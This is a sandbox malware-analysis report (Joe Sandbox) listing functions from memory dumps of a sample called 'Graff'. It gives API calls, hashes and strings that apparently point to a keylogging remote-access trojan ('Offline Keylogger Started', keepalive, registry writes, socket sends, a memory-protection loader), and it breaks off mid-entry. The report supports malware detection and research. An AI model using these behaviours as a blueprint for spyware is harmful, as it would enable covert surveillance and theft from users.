Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleSizeSleep
String ID: `AG
API String ID: 1958988193-3058481221
Opcode ID: 0586b8f9d43dbb7048378459902209a7f5a0eee35e296c9d9bb098e6f758afb4
Instruction ID: 61dc848fc85204ea7fc5a67171cad01df1347b3512dd41eabc6ad436608203b4
Opcode Fuzzy Hash: 0586b8f9d43dbb7048378459902209a7f5a0eee35e296c9d9bb098e6f758afb4
Instruction Fuzzy Hash: 3A11C4303407406AE731E764E88962B7A9AAB91311F44057EF18562AE3D7389CD1829D

Function 004126D2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 37registryCOMMON

Download Yara Rule

APIs

RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
RegSetValueExA.KERNEL32(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
RegCloseKey.ADVAPI32(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714

Strings

pth_unenc, xrefs: 004126D6
HgF, xrefs: 00412703

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: CloseCreateValue
String ID: HgF$pth_unenc
API String ID: 1818849710-3662775637
Opcode ID: 5b481c82f972a709f4cafc29cd199d4842e93e1d32f229a887fabe0a0eb009f9
Instruction ID: d7c223529d0a909ac1d5b5cf1be9cbd74eb10d05c00374dbcf2eb8abb0eb8976
Opcode Fuzzy Hash: 5b481c82f972a709f4cafc29cd199d4842e93e1d32f229a887fabe0a0eb009f9
Instruction Fuzzy Hash: 98F09032040104FBCB019FA0ED55EEF37ACEF04751F108139FD06A61A1EA75DE04EA94

Function 01477770 Relevance: 7.8, APIs: 5, Instructions: 311COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3741342627.0000000001476000.00000040.00000020.00020000.00000000.sdmp, Offset: 01476000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1476000_Graff.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb7927dc6896edca3cb2058d14b686bb091f9728231d1a1fdbc02456f8f93d93
Instruction ID: 66f03173387578cd91d92ca36a71ae273376d0bf79235160e81aa77409b4d51d
Opcode Fuzzy Hash: cb7927dc6896edca3cb2058d14b686bb091f9728231d1a1fdbc02456f8f93d93
Instruction Fuzzy Hash: 38D11214A24248D6EB10DFB4D854BDEB236FF68700F10A56DA10DEB3E0E77A4E41CB5A

Function 009E2750 Relevance: 7.7, APIs: 5, Instructions: 206librarymemoryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?), ref: 009E288A
GetProcAddress.KERNEL32(?,009DBFF9), ref: 009E28A8
ExitProcess.KERNEL32(?,009DBFF9), ref: 009E28B9
VirtualProtect.KERNEL32(00870000,00001000,00000004,?,00000000), ref: 009E2907
VirtualProtect.KERNEL32(00870000,00001000), ref: 009E291C

Memory Dump Source

Source File: 00000002.00000002.3738202698.00000000009E2000.00000080.00000001.01000000.00000004.sdmp, Offset: 00870000, based on PE: true

Associated: 00000002.00000002.3737547117.0000000000870000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.0000000000871000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.0000000000932000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.000000000093C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.000000000095C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.00000000009DC000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738243500.00000000009E3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738243500.00000000009ED000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738243500.00000000009FB000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_870000_Graff.jbxd

Similarity

API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
String ID:
API String ID: 1996367037-0
Opcode ID: 12f0bda09b05ac94724a9823df4e474e4c6116d3809bb29477b2525c02877e3d
Instruction ID: a643fd17a0535f94c97afeaf62760cc62785c1743b6067da5403377df6b7dacd
Opcode Fuzzy Hash: 12f0bda09b05ac94724a9823df4e474e4c6116d3809bb29477b2525c02877e3d
Instruction Fuzzy Hash: 425107B2A443924BD7269F79CCC0674779CEB513207280738C9E2C73C6EBA56C0687A0

Function 1000C7A7 Relevance: 7.6, APIs: 5, Instructions: 100libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860

Part of subcall function 1000C7E6: GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
Part of subcall function 1000C7E6: GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A

Memory Dump Source

Source File: 00000002.00000002.3743674864.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.3743631147.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3743674864.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_Graff.jbxd

Similarity

API ID: AddressHandleModuleProcProtectVirtual
String ID:
API String ID: 2099061454-0
Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
Instruction ID: abaa11d5974e3e1b05dfd32ec0224f7ddc3d76465740e120717e363e7a178845
Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
Instruction Fuzzy Hash: A921382140838A6FF711CBB44C05FA67FD8DB172E0F198696E040CB147DDA89845C3AE

Function 1000C803 Relevance: 7.6, APIs: 5, Instructions: 54librarymemoryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860

Memory Dump Source

Source File: 00000002.00000002.3743674864.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.3743631147.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3743674864.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_Graff.jbxd

Similarity

API ID: AddressProcProtectVirtual$HandleModule
String ID:
API String ID: 2152742572-0
Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
Instruction ID: 9138b94afbcae90e12a8614b592989542e7cb6e8cba5f1d72008c399686a5f74
Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
Instruction Fuzzy Hash: B7F0C2619497893CFA21C7B40C45EBA5FCCCB276E0B249A56F600C718BDCA5890693FE

Function 01479040 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 138fileCOMMON

Download Yara Rule

APIs

Part of subcall function 01478F30: Sleep.KERNEL32(000001F4), ref: 01478F41

CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01479130

Strings

JGNCZIO2VFEL0TD, xrefs: 014791B0, 014791B3

Memory Dump Source

Source File: 00000002.00000002.3741342627.0000000001476000.00000040.00000020.00020000.00000000.sdmp, Offset: 01476000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1476000_Graff.jbxd

Similarity

API ID: CreateFileSleep
String ID: JGNCZIO2VFEL0TD
API String ID: 2694422964-861957299
Opcode ID: fe90c346ca207db0cf0934c1b03f29988b72393c2ffff545f839642abd04fc19
Instruction ID: 27cb87790053eeb68f510079d816a0d8d249fd38046a91c8e779cb45decb2b96
Opcode Fuzzy Hash: fe90c346ca207db0cf0934c1b03f29988b72393c2ffff545f839642abd04fc19
Instruction Fuzzy Hash: F2519371D0424AEBEF11DBA4C818BEFBB78AF14314F004599E6187B2D0D7791B49CBA5

Function 00404468 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92synchronizationnetworkCOMMON

Download Yara Rule

APIs

send.WS2_32(0000030C,00000000,00000000,00000000), ref: 004044FD
WaitForSingleObject.KERNEL32(00000000,00000000,LAL,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000), ref: 0040450E
SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000,?,?,?,?,?,00414CE9), ref: 0040453C

Strings

LAL, xrefs: 00404473, 004044D6, 0040454A, 004044DC

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: EventObjectSingleWaitsend
String ID: LAL
API String ID: 3963590051-3302426157
Opcode ID: eeec8424d1dca8274feb663f053074e36491026ca6b896ad4dfdae31b9444f46
Instruction ID: 68c7e6670e460543dd9c105572fcb78fed3a06f13f8c8b410ea91b680b50408d
Opcode Fuzzy Hash: eeec8424d1dca8274feb663f053074e36491026ca6b896ad4dfdae31b9444f46
Instruction Fuzzy Hash: 192143B29001196BDF04BBA5DC96DEE777CFF54358B00013EF916B21E1EA78A604D6A4

Function 004098A5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,004099A9,?,00000000,00000000), ref: 0040992A
CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040993A
CreateThread.KERNEL32(00000000,00000000,Function_000099B5,?,00000000,00000000), ref: 00409946

Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905

Strings

Offline Keylogger Started, xrefs: 004098C7, 004098CE, 004098FB

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: CreateThread$LocalTimewsprintf
String ID: Offline Keylogger Started
API String ID: 465354869-4114347211
Opcode ID: d9d3f0991f6ce7a1b5bd44454b3b23c75cb0c67aab11927bca11613a8d5e3e92
Instruction ID: 73cd13916ef890eca76c0e29a3751801184202c96e3ca0ae9416a03768ca9078
Opcode Fuzzy Hash: d9d3f0991f6ce7a1b5bd44454b3b23c75cb0c67aab11927bca11613a8d5e3e92
Instruction Fuzzy Hash: CF11ABB15003097AD220BA36DC87CBF765CDA813A8B40053EF845225D3EA785E54C6FB

Function 00404915 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60timethreadCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(00000001,00473EE8,004745A8,00000000,?,?,?,?,?,00414D8A,?,00000001), ref: 00404946
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00473EE8,004745A8,00000000,?,?,?,?,?,00414D8A,?,00000001), ref: 00404994
CreateThread.KERNEL32(00000000,00000000,00404B1D,?,00000000,00000000), ref: 004049A7

Strings

KeepAlive | Enabled | Timeout: , xrefs: 0040495C

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: Create$EventLocalThreadTime
String ID: KeepAlive | Enabled | Timeout:
API String ID: 2532271599-1507639952
Opcode ID: 6e0b52a9fa592cdf1b4ef2c47e1fbfd68473d914f995ea42071976bf707fc6c7
Instruction ID: c7daaf492e0cec12b0841424890a61be8e5b61f5a3177df3d8f4b9063cedc03f
Opcode Fuzzy Hash: 6e0b52a9fa592cdf1b4ef2c47e1fbfd68473d914f995ea42071976bf707fc6c7
Instruction Fuzzy Hash: 38113AB19042547AC710A7BA8C49BCB7F9C9F86364F00407BF40462192C7789845CBFA

Function 00873B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00873B0F,SwapMouseButtons,00000004,?), ref: 00873B40
RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,00873B0F,SwapMouseButtons,00000004,?,?,?,?,00874D9C), ref: 00873B61
RegCloseKey.KERNEL32(00000000,?,?,00873B0F,SwapMouseButtons,00000004,?,?,?,?,00874D9C), ref: 00873B83

Strings

Control Panel\Mouse, xrefs: 00873B3E

Memory Dump Source

Source File: 00000002.00000002.3737593649.0000000000871000.00000040.00000001.01000000.00000004.sdmp, Offset: 00870000, based on PE: true

Associated: 00000002.00000002.3737547117.0000000000870000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.0000000000932000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.000000000093C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.000000000095C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.00000000009DC000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738202698.00000000009E2000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738243500.00000000009E3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738243500.00000000009ED000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738243500.00000000009FB000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_870000_Graff.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: a62e28d76f3b2476283d66fc6ee8e24ec354c76a168d72e62c306badce9dc457
Instruction ID: bb7fce2a9c2042614a4e6f2f6dcb3bd70c44559fda2a6e2f47a1af5298589cd7
Opcode Fuzzy Hash: a62e28d76f3b2476283d66fc6ee8e24ec354c76a168d72e62c306badce9dc457
Instruction Fuzzy Hash: A5112AB5520208FFDB208FA5DC84AEEB7BCFF15754B10855AA809D7114D231DE40A7A1

Function 004127D5 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31registryCOMMON

Download Yara Rule

APIs

RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
RegCloseKey.KERNEL32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809

Strings

TUF, xrefs: 004127D9, 004127FB, 004127DC

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: CloseCreateValue
String ID: TUF
API String ID: 1818849710-3431404234
Opcode ID: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
Instruction ID: 4d8f19d4f5fba69279ea975c705bdc3302fb28fe13ea63ccb444db4f968143a5
Opcode Fuzzy Hash: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
Instruction Fuzzy Hash: 8DE03071540204BFEF115B909C05FDB3BA8EB05B95F004161FA05F6191D271CE14D7A4

Function 0087DFD0 Relevance: 6.7, APIs: 2, Strings: 1, Instructions: 1414COMMON

Download Yara Rule

Strings

Variable must be of type 'Object'., xrefs: 008C32B7

Memory Dump Source

Source File: 00000002.00000002.3737593649.0000000000871000.00000040.00000001.01000000.00000004.sdmp, Offset: 00870000, based on PE: true

Associated: 00000002.00000002.3737547117.0000000000870000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.0000000000932000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.000000000093C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.000000000095C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.00000000009DC000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738202698.00000000009E2000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738243500.00000000009E3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738243500.00000000009ED000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738243500.00000000009FB000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_870000_Graff.jbxd

Similarity

API ID:
String ID: Variable must be of type 'Object'.
API String ID: 0-109567571
Opcode ID: fe228ae5ae9d6eb3b1fa4e90fbfcad67caa732a64dce9ccb40c0320b836bdde7
Instruction ID: c19e74415eb2d997520522f14edff53107c54d113c544370564c6546a2a5180c
Opcode Fuzzy Hash: fe228ae5ae9d6eb3b1fa4e90fbfcad67caa732a64dce9ccb40c0320b836bdde7
Instruction Fuzzy Hash: 8AC27975A00209CFCB24DF58C881AADB7B1FB19314F24C5A9E919EB3A5D371ED42CB91

Function 00404688 Relevance: 6.1, APIs: 4, Instructions: 121synchronizationthreadCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,?), ref: 00404778
CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0040478C
WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,?,?,00000000), ref: 00404797
CloseHandle.KERNEL32(?,?,00000000,00000000,?,?,00000000), ref: 004047A0

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: Create$CloseEventHandleObjectSingleThreadWait
String ID:
API String ID: 3360349984-0
Opcode ID: aa2f0ef8b845e1b4e62b223fb983f7476a87b93d868ecd7d7f45250861b2e74f
Instruction ID: f4983b6e647f91c6eb1a16b69ab68a2f9d5597509a23169db7b615edd0c6cdea
Opcode Fuzzy Hash: aa2f0ef8b845e1b4e62b223fb983f7476a87b93d868ecd7d7f45250861b2e74f
Instruction Fuzzy Hash: 34417171508301ABC700FB61CC55D7FB7E9AFD5315F00093EF892A32E2EA389909866A

Function 0041B58F Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041B6A5,00000000,00000000,?), ref: 0041B5CE
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,0040A009,?,00000000,00000000), ref: 0041B5EB
WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040A009,?,00000000,00000000), ref: 0041B5FF
CloseHandle.KERNEL32(00000000,?,0040A009,?,00000000,00000000), ref: 0041B60C

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandlePointerWrite
String ID:
API String ID: 3604237281-0
Opcode ID: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
Instruction ID: 083799f3d1f95ebfb1fb2bbe8bc155d348f6fb5eb74ded268dd94cd43ec1eb57
Opcode Fuzzy Hash: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
Instruction Fuzzy Hash: 7501F5712092157FE6104F28AC89EBB739EEB86379F10063AF552C22C0D725CD8586BE

Function 0041B61A Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
GetFileSize.KERNEL32(00000000,00000000), ref: 0041B647
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041B66C
CloseHandle.KERNEL32(00000000), ref: 0041B67A

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleReadSize
String ID:
API String ID: 3919263394-0
Opcode ID: 0e0033f64f8451bb372a2b2a88171f1815919a66d822dbb045df1505d3cebfa8
Instruction ID: 0a6fce4b3becde4f67ebc64a516323d43c368a538d14007d95c0a1c89629aad3
Opcode Fuzzy Hash: 0e0033f64f8451bb372a2b2a88171f1815919a66d822dbb045df1505d3cebfa8
Instruction Fuzzy Hash: B3F0F6B12053047FE6101B25FC85FBF375CDB867A5F00023EFC01A22D1DA658C459179

Function 0087EC40 Relevance: 5.7, APIs: 3, Instructions: 1195COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0087FE66

Memory Dump Source

Source File: 00000002.00000002.3737593649.0000000000871000.00000040.00000001.01000000.00000004.sdmp, Offset: 00870000, based on PE: true

Associated: 00000002.00000002.3737547117.0000000000870000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.0000000000932000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.000000000093C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.000000000095C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.00000000009DC000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738202698.00000000009E2000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738243500.00000000009E3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738243500.00000000009ED000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738243500.00000000009FB000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_870000_Graff.jbxd

Similarity

API ID: Init_thread_footer
String ID:
API String ID: 1385522511-0
Opcode ID: 18338bde3927d4cb34be95aff7ff591a35b2968099a897cfe5e044bd76daec41
Instruction ID: 1f88bc93a2eac2fd0aa67d58397778dfde9a4e0785e37ebead3238fd444abecc
Opcode Fuzzy Hash: 18338bde3927d4cb34be95aff7ff591a35b2968099a897cfe5e044bd76daec41
Instruction Fuzzy Hash: AFB25874608340CFCB24CF19C490A2AB7E1FB99314F24896DFA99CB35AD771E885DB52

Function 00414B9B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 163COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 00414BC0
GetTickCount.KERNEL32 ref: 00414C3C

Strings

>G, xrefs: 00414BEF

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: CountEventTick
String ID: >G
API String ID: 180926312-1296849874
Opcode ID: a55f4b7449afb00f035356c90926f3eb23636c88c5add2eae33f620243527796
Instruction ID: d5b3ec7783a4dd7183bbf31121b5a8e130ff38f85bff4fd723ced1f164cd3d8d
Opcode Fuzzy Hash: a55f4b7449afb00f035356c90926f3eb23636c88c5add2eae33f620243527796
Instruction Fuzzy Hash: 1A5170315042409AC624FB71D8A2AEF73A5AFD1314F40853FF94A671E2EF389949C69A

Function 0088FDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00890668

Part of subcall function 008932A4: RaiseException.KERNEL32(?,?,?,0089068A,?,009413F0,?,?,?,?,?,?,0089068A,?,00938738), ref: 00893304

__CxxThrowException@8.LIBVCRUNTIME ref: 00890685

Strings

Unknown exception, xrefs: 00890692

Memory Dump Source

Source File: 00000002.00000002.3737593649.0000000000871000.00000040.00000001.01000000.00000004.sdmp, Offset: 00870000, based on PE: true

Associated: 00000002.00000002.3737547117.0000000000870000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.0000000000932000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.000000000093C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.000000000095C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.00000000009DC000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738202698.00000000009E2000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738243500.00000000009E3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738243500.00000000009ED000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738243500.00000000009FB000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_870000_Graff.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: 93fcae3645e093f8f22045a47a6d61ec817913dbbcddd56a5ed4198389acd156
Instruction ID: cc9145b61d05460a5b7d7cddc2b670c8bfba2e230d1e8f7c6f4d7bfe1fdd4e42
Opcode Fuzzy Hash: 93fcae3645e093f8f22045a47a6d61ec817913dbbcddd56a5ed4198389acd156
Instruction Fuzzy Hash: 31F0442490030D6B8F10B6A8D846D5E776CFE50354B644531BA24D55D2EF71DB55CE82

Function 0040BED7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON

Download Yara Rule

APIs

